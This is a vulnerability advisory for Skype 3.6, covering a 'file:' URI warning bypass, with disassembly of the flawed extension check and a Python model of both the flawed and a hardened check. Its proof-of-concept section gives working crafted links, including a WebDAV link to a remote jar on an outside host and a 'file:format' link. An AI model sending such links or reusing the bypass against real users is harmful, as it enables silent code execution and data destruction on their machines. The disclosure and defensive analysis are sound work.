Skype File URI Security Bypass Code Execution Vulnerability

I - BACKGROUND

Skype is a VoIP application for making phone calls and chatting over the Internet.

II - DESCRIPTION

Two vulnerabilities have been identified in Skype which could be exploited by attackers to bypass security restrictions and execute files without any warning message. User interaction is required to exploit these vulnerabilities.

1) If a "file:" link is sent to the target, Skype alerts the user about the danger of executing unknown files once the link is clicked. However, a remote attacker could create a specially crafted "file:" URL that bypasses this security warning and executes the file without any warning message.

There is a limitation to exploiting this vulnerability: a NetBIOS name has to be used to bypass the dialog box that warns the user about digital code signing, which restricts exploitation to a local network in the majority of cases.

2) Skype doesn't check whether a "file:" link points to a URL with a .jar extension (Java executable). Once the user clicks the link, the jar file is executed on the system without any Skype or Windows warning. This vulnerability could be used for remote code execution if the attacker sends a link pointing to a file on a WebDAV server. Windows uses two methods to retrieve the file:

a) Shared folder - The link is treated as a shared folder and Windows tries to connect over NetBIOS.

b) WebDAV client - Windows Explorer is able to browse a WebDAV server as a network place. If the first method fails, the integrated WebDAV client is used, allowing the file to be downloaded and executed from a remote WebDAV server.

E.g.: file:\\webdavserver\dav\file.jar

POC: file:\\www.inkatel.com\MyDav\myjar.jar - This example will execute calc.exe

III - DISCLOSURE TIMELINE

IV - AFFECTED PRODUCTS

Skype 3.6.0.248 (previous versions are affected too)

V - ADVANCED DESCRIPTION

When a "file:" URL is sent to a chat conversation, Skype allows the user to click on it.
Skype performs some checks on the link to verify whether it is a URL (to launch a web browser) or a mailto link (to launch the email client), and whether the link has a dangerous extension: .ade, .adp, .asd, .bas, .bat, .cab, .chm, .cmd, .com, .cpl, .crt, .dll, .eml, .exe, .hlp, .hta, .inf, .ins, .isp, .js, in order to warn the user about the danger of executing unknown files. However, this security restriction is easy to bypass with two methods:

A) If the extension is uppercase, Skype executes the file (the comparison is not case-insensitive):

file:\\computername\file.EXE

CODE:00E430A8 ; =============== S U B R O U T I N E =======================================
CODE:00E430A8
CODE:00E430A8 ; Attributes: bp-based frame
CODE:00E430A8
CODE:00E430A8 CompareExtension proc near ; CODE XREF: CODE:00CF35CCp
CODE:00E430A8 ; sub_E26F74+6A3p
CODE:00E430A8
CODE:00E430A8 var_14 = dword ptr -14h
CODE:00E430A8 var_10 = dword ptr -10h
CODE:00E430A8 var_C = dword ptr -0Ch
CODE:00E430A8 var_8 = dword ptr -8
CODE:00E430A8 var_4 = dword ptr -4
[....]

In the following function the string is searched for 0x2E (".") to retrieve the extension:

CODE:00E430DB loc_E430DB: ; CODE XREF: CompareExtension+5Bj
CODE:00E430DB mov eax, [ebp+var_4]
CODE:00E430DE cmp word ptr [eax+ebx*2-2], '.' ; Look for "." to find extension
CODE:00E430E4 jnz short loc_E43100
CODE:00E430E6 lea eax, [ebp+var_8]
CODE:00E430E9 push eax
CODE:00E430EA mov eax, [ebp+var_4]
CODE:00E430ED call sub_405E80
CODE:00E430F2 mov ecx, eax
CODE:00E430F4 mov edx, ebx
CODE:00E430F6 mov eax, [ebp+var_4]
CODE:00E430F9 call sub_406020
CODE:00E430FE jmp short loc_E43105
CODE:00E43100 ; ---------------------------------------------------------------------------
CODE:00E43100
CODE:00E43100 loc_E43100: ; CODE XREF: CompareExtension+3Cj
CODE:00E43100 dec ebx
CODE:00E43101 test ebx, ebx
CODE:00E43103 jg short loc_E430DB

Once the extension is found, it is compared with the list of dangerous extensions.
However, this comparison is not case-insensitive:

CODE:00E4310A mov esi, offset unk_E781D4 ; List of dangerous extensions ".ade, .adp, .asd, .bas, .bat, .cab, .chm, .cmd, .com, .cpl, .crt, .dll, .eml, .exe, .hlp, .hta, .inf, .ins, .isp, .js"
CODE:00E4310F Compare_ext: ; CODE XREF: CompareExtension+86j
CODE:00E4310F lea eax, [ebp+var_C]
CODE:00E43112 mov edx, esi
CODE:00E43114 call sub_405DB4
CODE:00E43119 mov edx, [ebp+var_C] ; Dangerous extension (.ade, .adp, ...)
CODE:00E43119 ;
CODE:00E4311C mov eax, [ebp+var_8] ; Extension to verify
CODE:00E4311F call sub_405F9C ; This function compares our extension
CODE:00E4311F ; with one of the dangerous extensions (this comparison isn't case-insensitive)
CODE:00E43124 jnz short loc_E4312A
CODE:00E43126 mov bl, 1
CODE:00E43128 jmp short loc_E4316B
CODE:00E4312A ; ---------------------------------------------------------------------------
CODE:00E4312A
CODE:00E4312A loc_E4312A: ; CODE XREF: CompareExtension+7Cj
CODE:00E4312A add esi, 5
CODE:00E4312D dec ebx
CODE:00E4312E jnz short Compare_ext

B) If a "file:" URL is sent without the executable extension or with a backslash at the end, Skype executes the file without any warning:

file:\\computername\file
file:\\computername\file\

Skype uses ShellExecute to launch the application:

CODE:0049BEE8 ; int __thiscall sub_49BEE8(LPCWSTR lpFile,INT nShowCmd,LPCWSTR lpDirectory,LPCWSTR lpParameters)
CODE:0049BEE8 sub_49BEE8 proc near ; CODE XREF: sub_E287C4+6Dp
CODE:0049BEE8 ; sub_E28874+150p ...
CODE:0049BEE8
CODE:0049BEE8 var_14 = dword ptr -14h
CODE:0049BEE8 var_10 = dword ptr -10h
CODE:0049BEE8 var_C = dword ptr -0Ch
CODE:0049BEE8 var_8 = dword ptr -8
CODE:0049BEE8 var_4 = dword ptr -4
CODE:0049BEE8 nShowCmd = dword ptr 8
CODE:0049BEE8 lpDirectory = dword ptr 0Ch
CODE:0049BEE8 lpParameters = dword ptr 10h
[...]
CODE:0049BF16 mov eax, [ebp+nShowCmd]
CODE:0049BF19 push eax ; nShowCmd
CODE:0049BF1A mov eax, [ebp+lpDirectory]
CODE:0049BF1D push eax ; lpDirectory
CODE:0049BF1E mov eax, [ebp+lpParameters]
CODE:0049BF21 push eax ; lpParameters
CODE:0049BF22 push edi ; lpFile
CODE:0049BF23 lea eax, [ebp+var_4]
CODE:0049BF26 mov edx, esi
CODE:0049BF28 call sub_405D78
CODE:0049BF2D mov eax, [ebp+var_4]
CODE:0049BF30 call sub_49B524
CODE:0049BF35 push eax ; lpOperation
CODE:0049BF36 push ebx ; hwnd
CODE:0049BF37 call ShellExecuteW ; Process file: URL

This vulnerability could be more dangerous in a Local Intranet, because this zone is trusted by default in Internet Explorer: "Launching applications and unsafe files" is set to "Enable".

So an attacker could share a folder on his computer, put an executable in this folder, for example file.exe, and send one of these links to the target:

file:\\computername\file
file:\\computername\file\
file:\\computername\file.EXE

NOTE: computername shouldn't be an IP address. If you use an IP address as computername, Windows will show a warning dialog box that warns the user about digital code signing. If you use a NetBIOS name this warning won't appear.

Once the link is clicked, the file will be executed without any warning. The second example is more dangerous, because it looks like a directory but in fact the file (file.exe) will be executed.

The same vulnerability could be triggered with "About Me" profile data. An attacker could set this profile record to the specially crafted "file:" URL to bypass this security warning.

VI - POCs

1) More examples:

file:cmd
file:calc
file:format
file:tlntsvr

2) file:\\www.inkatel.com\MyDav\myjar.jar -> Executes calc.exe

VII - CREDIT

Bug found by Ismael Briones [http://www.inkatel.com]
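The extension check described in section V, modelled in Python as an added example that is not Skype's code: flawed_is_dangerous reproduces the case-sensitive tail comparison the disassembly shows, and hardened_is_dangerous is an assumed defensive rewrite (canonicalise the target first, compare case-insensitively, and treat an extension-less target and .jar as dangerous); the sample links are constructed.

```python
from urllib.parse import unquote

# The extension list the advisory says CompareExtension walks (unk_E781D4).
DANGEROUS_EXTENSIONS = {".ade", ".adp", ".asd", ".bas", ".bat", ".cab", ".chm",
                        ".cmd", ".com", ".cpl", ".crt", ".dll", ".eml", ".exe",
                        ".hlp", ".hta", ".inf", ".ins", ".isp", ".js"}


def flawed_is_dangerous(link: str) -> bool:
    """Model of the check in the disassembly: scan the raw link backwards
    for '.', take everything after it, and compare case-sensitively."""
    i = link.rfind(".")
    if i < 0:
        return False  # no '.' anywhere, so nothing is compared and the link passes
    return link[i:] in DANGEROUS_EXTENSIONS


def hardened_is_dangerous(link: str) -> bool:
    """Assumed defensive rewrite (not Skype's code): canonicalise the target
    before looking at its extension, compare case-insensitively, and treat an
    ambiguous target (no extension) as dangerous, since ShellExecute will
    still resolve and run it."""
    path = link[5:] if link[:5].lower() == "file:" else link
    path = unquote(path).replace("/", "\\").rstrip("\\")  # trailing '\' hid the name
    name = path.rsplit("\\", 1)[-1]
    i = name.rfind(".")
    if i < 0:
        return True  # 'file' or 'file\' with no extension: warn rather than trust it
    ext = name[i:].lower()
    return ext in DANGEROUS_EXTENSIONS or ext == ".jar"  # .jar was missing from the list


if __name__ == "__main__":
    # Constructed sample links mirroring the advisory's cases.
    samples = [
        "file:\\\\computername\\file.exe",       # caught by both checks
        "file:\\\\computername\\file.EXE",       # uppercase bypass
        "file:\\\\computername\\file\\",         # trailing backslash bypass
        "file:\\\\computername\\file",           # missing extension bypass
        "file:\\\\webdavserver\\dav\\file.jar",  # .jar not in the list
        "file:///C:/docs/readme.txt",            # harmless document
    ]
    for s in samples:
        print(f"{s:40} flawed={flawed_is_dangerous(s)!s:5} hardened={hardened_is_dangerous(s)}")
```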